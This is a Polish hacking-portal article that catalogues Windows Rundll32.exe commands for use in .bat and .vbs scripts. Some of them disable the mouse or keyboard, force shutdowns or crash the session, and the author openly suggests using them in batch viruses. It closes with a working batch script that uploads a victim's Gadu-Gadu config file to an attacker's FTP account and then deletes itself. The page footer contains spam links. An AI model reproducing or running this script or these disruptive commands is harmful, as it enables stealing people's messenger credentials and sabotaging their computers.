Hacking  
  Kwiecień 21 2018 07:44:38  
 
Nawigacja
folder Portal
. Artykuły
. Download
. Forum
. Szukaj
. FAQ
. Regulamin
folder Hacking
. Gry Hakerskie
. Filmy
folder Delphi
. Kursy
. Faq
. Źródła
. Komponenty
. Artykuły
folderWebmaster
. JavaScripts
. Skrypty PHP
folderRóżne
. Kontakt
. Zlokalizuj ip
Aktualnie online
. Gości online: 6

. Użytkowników online: 0

. Łącznie użytkowników: 154,509
. Najnowszy użytkownik: konkol01
Ostatnie artykuły
. Metoda ataku symlin...
. Asembler x86 w pigułce
. Binder plików z komp...
. [Asembler/MASM] Pobi...
. Braifuck 4 fun
Nawigacja
Artykuły » Windows » Pliki wsadowe .bat przydatne komendy
Pliki wsadowe .bat przydatne komendy

Pliki wsadowe .bat przydatne komendy

Wykorzystanie RUNDLL32 i komendy przydatne przy tworzeniu plikow wsadowych
Wykorzystanie Rundll32.exe w plikach *.BAT pod Windowsem Pliki *.BAT (pliki wsadowe MS-DOS) dobrze nadają się do wywoływania poleceń przez Rundll32.exe. Standardowo po wstawieniu polecenia z Rundll32.exe do pliku BAT i uruchomieniu go, w oknie DOS pokaże się, do jakiego polecenia się odwołujemy, ale można temu zapobiec. Oto podstawowe polecenia plików skryptów *.BAT:

@ECHO OFF - (stosowany w 1 linii pliku) zapobiega wyświetlaniu informacji o tym, co się dzieje, czyli nie pokazuje podczas działania, do jakiego polecenia się odwołujemy. ECHO - wszystko wpisane po tym poleceniu będzie wyświetlana na ekranie, jest to dobre do przekazywania informacji użytkownikowi. REM - to polecenie to komentarz, zapisuje się po nim informacje ważne tylko dla nas (chyba wiecie, do czego dokładnie służą komentarze) UWAGA: Każdego polecenia używa się w innej linii, nigdy dwóch w jednej, bo wtedy tylko pierwsze zostanie wykonane!

Co trzeba zrobić, aby utworzyć plik *.BAT: 1. Otwieramy nowy dokument tekstowy w systemowym Notatniku lub innym edytorze tekstu. 2. Wpisujemy:

@ECHO OFF TUTAJ POLECENIE RUNDLL32.EXE ECHO Wlasnie wykonalem polecenie Rundll32.exe REM nie uzywaj polskich znakow, bo i tak nie będzie ich widac!!! 3. Zapisujemy plik jako *.BAT

Koniec BATowania, gotowy przykład:

@ECHO OFF Rundll32.exe shell32.dll,ShellAboutA ECHO Teraz zobacz ile pamieci zuzywasz! REM wywoluje informacje o pamieci i pokazuje ECHO W plikach *.BAT można stosować kilka poleceń Rundll32.exe po kolei. Odpalenie tego pliku spowoduje pokazanie okna informacji o pamięci fizycznej i zasobach oraz okna DOS z napisem: Teraz zobacz ile pamięci zuzywasz!.

Wykorzystanie Rundll32.exe w plikach *.VBS pod Windowsem Pliki *.vbs (Visual Basic Script) mogą być wykorzystywane do wywoływania poleceń przez Rundll32.exe w bardzo prosty sposób i na każdym komputerze, w którym jest dostępny Notatnik! A oto, co trzeba zrobić:

1. Otwieramy nowy dokument tekstowy w systemowym Notatniku lub innym edytorze tekstu. 2. Wpisujemy (polecenie musi być pomiędzy znakami " i " ):

set WshShell = Wscript.CreateObject("Wscript.Shell" ) WshShell.Run ("TUTAJ POLECENIE RUNDLL32.EXE" ) 3. I zapisujemy plik z rozszerzeniem *.vbs

Przykład wygląda tak:

set WshShell = Wscript.CreateObject("Wscript.Shell" ) WshShell.Run ("Rundll32.exe mouse,disable" ) Odpalenie takiego pliku (z rozszerzeniem *.vbs) spowoduje blokadę myszki.

Wykorzystanie Rundll32.exe w skrótach Windows Po prostu na Pulpicie klikasz PPM (prawym przyciskiem myszki) i wybierasz Nowy | Skrót. W oknie, które się pokaże w wierszu poleceń wpisujesz polecenie Rundll32.exe (np. Rundll32.exe shell32.dll,Control_RunDLL main.cpl @0 - wpisujesz polecenie bez żadnych nawiasów etc.) i klikasz Dalej. Teraz wybierasz nazwę dla skrótu i klikasz Zakończ. Skrót będzie miał jako ikonę logo Windows. Po uruchomieniu skrótu polecenie Rundll32.exe zostanie wykonane.

Wykorzystanie Rundll32.exe przez okno Uruchom Klikasz pasek Start | Uruchom lub kombinacje klawiszy WIN+R w polu Otwórz: wpisujemy polecenie Rundll32.exe (np. Rundll32.exe shell,shellexecute wpisujesz polecenie bez żadnych nawiasów etc.) i klikamy OK, po czym polecenie zostanie wykonane.

Wykorzystanie Rundll32.exe w Delphi Polecenie Rundll32.exe łatwo można wykorzystać w Delphi. W sekcji uses trzeba dodać moduł ShellApi, ponieważ będziemy korzystać z funkcji ShellExecute. Poniżej znajduje się gotowy kod z komentarzem.

ShellExecute(Handle, 'open', 'rundll32', 'keyboard, disable', nil, SW_SHOWNORMAL); {otwórz dzięki shellexecute rundll32 i wywołaj polecenie blokady klawiatury}

Wyraźnie widać, że tutaj polecenie wpisuje się trochę inaczej, tak jakby dzieli je się na dwa człony pierwszy Rundll (po 'open', pomiędzy znakami ( ' ) i bez rozszerzenia) i drugi keyboard, disable (po 'Rundll32', pomiędzy znakami ( ' )). Tak można wykorzystać każde polecenie Rundll32.exe, trzeba tylko pamiętać o dodaniu ShellApi do sekcji Uses.

Wykorzystanie Rundll32.exe do uruchamiania procedur i funkcji zawartych we wszystkich plikach *.DLL W skutek moich doświadczeń prowadzonych nad plikiem Rundll32.exe stwierdziłem, że można dzięki niemu wywołać procedury i funkcje ze wszystkich plików *.DLL Można to zrobić na każdy z wyżej wymienionych sposobów, tak jakby tworząc nowe polecenia. Składnia polecenia wygląda tak:

Rundll32.exe (NAZWA PLIKU),(PROCEDURA) Rundll32.exe - przedni człon polecenia. NAZWA PLIKU - nazwa pliku, do którego się odwołujemy z podanym rozszerzeniem oraz jeżeli dany plik nie znajduje się w katalogu WINDOWS, z pełną ścieżką pliku. PROCEDURA - nazwa procedury lub funkcji, która ma zostać wywołana, w przypadku, gdy procedura\funkcja wymaga podania parametru wpisuje się go w nawiasach kwadratowych po spacji od nazwy porcedury\funkcji tak jak np. w (Rundll32.exe user,setcareblinktime [n] - szybkość migania kursora)

CZYLI:

Rundll32.exe shell,shellexecute, wykonuje procedure SHELLEXECUTE z pliku SHELL.DLL

To samo tyczy się wszystkich plików np. *.DLL stworzonych przez nas. Stworzyłem bibliotekę DLL o nazwie test.dll (umieściłem ją na Pulpicie) i umieściłem w niej procedurę losującą liczbę w zakresie 1..100 i pokazującą wynik za pomocą polecenia ShowMessage (z Delphi). Procedurę nazwałem losuj100. Aby wywołać procedurę losuj100 za pomocą Rundll32.exe muszę wywołać polecenie:

Rundll32.exe C:\windows\pulpit\test.dll,losuj100 I na ekranie zobaczę losowo wybraną liczbę. Ale i błąd aplikacji Rundll32.exe. Z moich licznych badań wynika, że niektóre procedury, funkcje z parametrem nie chcą się wykonywać, pokazuje się tylko błąd. Reszta działa, ale błąd jest ciągle, nie zauważyłem żadnych zmian związanych z funkcjonowaniem komputera na skutek błędu. Aplikacja Rundll32.exe może potrafi wywoływać procedury i funkcje z plików *.EXE przykładem tego jest: Rundll32.exe krnl386.exe,ExitKernel, ale nie wiem jeszcze jak je wywoływać.

KOMENDY

rundll32 mouse,disable
Myszy nie da się włączyć, nie ma polecenia enable. Dopiero po ponownym uruchomieniu Windowsa mysz będzie działać. Można to polecenie umieścić w jakimś skrócie, wpisać do Rejestru, bądź wykorzystać w swoim programie.

rundll32 keyboard,disable
Klawaitury nie da się włączyć, nie ma polecenia enable. Dopiero po ponownym uruchomieniu Windowsa klawiatura będzie działać. Co ciekawe kombinacja Ctrl+Alt+Delete działa nadal. Można to polecenie umieścić w jakimś skrócie, wpisać do Rejestru, bądź wykorzystać w swoim programie itd. Nie bede tak pisal przeciez przez caly czas, pokaze wam liste parametrow Rundll32 o to i ona:

user,exitwindows - zakończenie pracy Windows
user,wnetconnectdialog - okno dialogowe Mapuj Dysk Sieciowy
user,wnetdisconnectdialog - okno dialogowe Odłącz Dysk Sieciowy
user,disableoemlayer - wyłącza grafikę Windows (wygląda jak zawieszenie)
user,enableoemlayer - włącza grafikę Windows
user,repaintscreen - odświeża ekran [F5]
user,setcursorpos - kursor myszki leci w lewy-górny róg
user,tilechildwindows - ustawia okna w rzędzie
user,cascadechildwindows - odwrotność powyższego
user,swapmousebutton - zamienia klawisze myszki
user,setcareblinktime [n] - szybkość migania kursora
user,setdoubleckilcktime [n] - szybkość dwukliku
user.exe,MessageBeep - małe piknięcie
diskcopy,DiskCopyRunDLL - okno dialogowe Kopiuj Dysk
krnl386.exe,ExitKernel - zamknięcie sesji Kernela (bardzo szybkie zamknięcie systemu)
mouse,disable - blokada myszki
keyboard,disable - blokada klawiatury
shell,shellexecute - otwiera okno explorera
shell32,OpenAS_RunDLL - okno dialogowe Otwórz z ...
shell32,SHFormatDrive - okno dialogowe Formatuj
shell32,ShellAboutA - info o pamięci fizycznej i zasobach
shell32,SHexitWindowsEX 0 - wylogowanie z Windowsa (potwierdzenie)
shell32,SHexitWindowsEX 1 - zamyka Windows (potwierdzenie)
shell32,SHexitWindowsEX 2 - restartuje Windows
shell32,SHexitWindowsEX 3 - restartuje powloke Windows
shell32,Control_RunDLL - otwiera Panel Sterowania
shell32,Control_RunDLL desk.cpl - okno właściwości ekranu
shell32,Control_RunDLL main.cpl @0 - okno wlaściwości myszki
shell32,Control_RunDLL main.cpl @1 - okno wlaściwości klawiatury
shell32,Control_RunDLL main.cpl @3 - okno drukarek
shell32,Control_RunDLL powercfg.cpl - właściwości zarządzania energią
shell32,Control_RunDLL sysdm.cpl - okno właściwości systemu
shell32,Control_RunDLL datetime.cpl - okno ustawień daty i czasu
shell32,Control_RunDLL intl.cplv - okno ustawień regionalnych
shell32,Control_RunDLL joy.cpl - okno kontrolerów gry
shell32,Control_RunDLL sticpl.cpl - wlaściwości skanerów
shell32,Control_RunDLL findfast.cpl - okno Find FastuJeszcze o przydatnych poleceniach zawartych w rundll32 które możemy wykorzystać w wirusach .bat:

Rundll32

Wstęp Witam w moim pierwszym artykule w @t. Artykuł będzie o wykorzystaniu aplikacji Rundll32.exe w Windows (na pewno w 9x, Me, 2000 oraz XP, co do NT to nie wiem, bo nie miałem okazji sprawdzić, ale pewnie tak). Ten temat był już kilka razy poruszany w magazynie, ale teraz przedstawię dosyć obszerną listę poleceń i kilka nowych sposobów na ich wykorzystanie. Dobra, zaczynajmy.

Rundll32.exe - jest to aplikacja systemu Windows odpowiadająca za wywoływanie procedur i funkcji z innych bibliotek DLL, plików EXE. Ma ona bardzo duże możliwości, ponieważ pozwala wywoływać procedury i funkcje nawet z plików DLL stworzonych przez nas samych, a w dodatku jest to bardzo łatwe. Więcej o wywoływaniu procedur z naszych plików DLL pod koniec artykułu.

Polecenia Rundll32.exe: Rundll32.exe appwiz.cpl,NewLinkHere - otwiera okno Utwórz nowy skrót (tylko XP)
Rundll32.exe desk.cpl,InstallScreenSaver - wygaszacz ekranu
Rundll32.exe diskcopy,DiskCopyRunDLL - okno dialogowe Kopiuj dysk
Rundll32.exe exekrnl386.exe,GlobalrealLoc - przerwanie wszystkich funkcji systemowych
Rundll32.exe keyboard,disable - blokada klawiatury
Rundll32.exe keymgr.dll,KRShowKeyMgr - otwiera okno Przechwytywanie nazwy i hasła użytkownika (tylko XP)
Rundll32.exe krnl386.exe,ExitKernel - zamknięcie sesji kernela (szybkie zamkniecie systemu)
Rundll32.exe krnl386.exe,fatalexit - wyświetla biały ekran Błąd programu
Rundll32.exe krnl386.exe,switchstacko - okno błędu Rundll32 (chyba tylko XP)
Rundll32.exe mouse,disable - blokada myszki
Rundll32.exe msprint2.dll,RUNDLL_PrintTestPage - wydrukowanie strony testowej
Rundll32.exe rnaui.dll,RnaWizard -1 - otwiera kreator połączeń dial-up
Rundll32.exe shell,shellexecute - otwiera okno Eksplorera
Rundll32.exe shell32.dll,Control_RunDLL - otwiera Panel Sterowania
Rundll32.exe shell32.dll,Control_RunDLL datetime.cpl - okno ustawień daty i czasu
Rundll32.exe shell32.dll,Control_RunDLL desk.cpl - okno właściwości ekranu
Rundll32.exe shell32.dll,Control_RunDLL hotplug.dll - otwiera okno Bezpieczne usuwanie sprzętu (tylko XP)
Rundll32.exe shell32.dll,Control_RunDLL joy.cpl - okno kontrolerów gry
Rundll32.exe shell32.dll,Control_RunDLL main.cpl @0 - otwiera okno właściwości myszy
Rundll32.exe shell32.dll,Control_RunDLL main.cpl @1 - otwiera okno właściwości klawiatury
Rundll32.exe shell32.dll,Control_RunDLL main.cpl @2 - otwiera okno właściwości drukarek
Rundll32.exe shell32.dll,Control_RunDLL main.cpl @3 - otwiera okno właściwości czcionek
Rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl - okno właściwości systemu
Rundll32.exe shell32.dll,OpenAs_RunDll - otwiera okno dialogowe Otwórz z...
Rundll32.exe shell32.dll,ShellAboutA - informacja o pamięci fizycznej i zasobach
Rundll32.exe shell32.dll,SHexitWindowsEX 0 - wylogowanie z Windows
Rundll32.exe shell32.dll,SHexitWindowsEX 1 - zamyka Windows
Rundll32.exe shell32.dll,SHexitWindowsEX 2 - restartuje Windows
Rundll32.exe shell32.dll,SHexitWindowsEX 3 - restartuje powłokę Windows
Rundll32.exe shell32.dll,SHFormatDrive - okno dialogowe Formatuj
Rundll32.exe user,cascadechildwindows - odwrotność powyższego
Rundll32.exe user,disableoemlayer - wyłącza grafikę Windows
Rundll32.exe user,enableoemlayer - włącza grafikę Windows
Rundll32.exe user,exitwindows - zakończenie pracy Windows
Rundll32.exe user,repaintscreen - odświeża ekran
Rundll32.exe user,setcaretblinktime [n] - szybkość migania kursora
Rundll32.exe User,setcursorpos - przesuwa kursor w lewy górny róg (pozycja 0, 0)
Rundll32.exe user,setdoubleckilcktime [n] - szybkość dwukrotnego kliknięcia myszką
Rundll32.exe user,swapmousebutton - zamienia klawisze myszki
Rundll32.exe user,tilechildwindows - ustawia okna w rzędzie
Rundll32.exe user,wnetdisconnectdialog - okno dialogowe Odłącz dysk sieciowy
Rundll32.exe user.exe,MessageBeep - odtwarza dźwięk Na koniec malutki kod na wykradanie plików np. archiwum.dat lub config.dat musimy sobie założyć konto na ftp np na free.of.pl i taki kod zapisujemy do postaci plik.bat i jeszcze w pierwsze 3 pola wpisujemy nazwe ftp, login i hasło @echo off echo o free.of.pl>> ftp echo nazwa-usera>> ftp echo hasło>> ftp echo bin >> ftp echo !cls >> ftp echo put "C:\Documents and Settings\Wpisz-tu-nazwe-usera\Gadu-Gadu\Ja1\config.dat" config.dat >> ftp %systemroot%\system32\ftp -v -s:ftp del ftp del %0

Logowanie
Nazwa użytkownika

HasłoNie masz jeszcze konta?
Zarejestruj się

Nie możesz się zalogować?
Poproś o nowe hasło
Shoutbox
Musisz zalogować się, aby móc dodać wiadomość.

06-04-2018 22:35
http://piciu1902.c
t8.pl/

29-03-2018 00:22
1.1. Гро
мад
ськ
а орг
ані
з&#1

24-03-2018 16:26
guest test post bbcode <a href="http://guestt
esttststs.com/"
Chytryhtml</a> http://guesttestts
tsts.com/ simple

24-03-2018 14:05
potawatomi casino <a href="https://onlin
ecasinoplay24.com&q
uot Chytryfree casino slots online</a> <a href=" https://onlinecasi
noplay24

23-03-2018 00:15
http://dkjshye7s63
2.com There are actually a number of particulars like that to take into consideration. That is a great point to deliver up. I offer the ideas above as common inspiration but clearl

Licznik
33,256,755 unikalne wizyty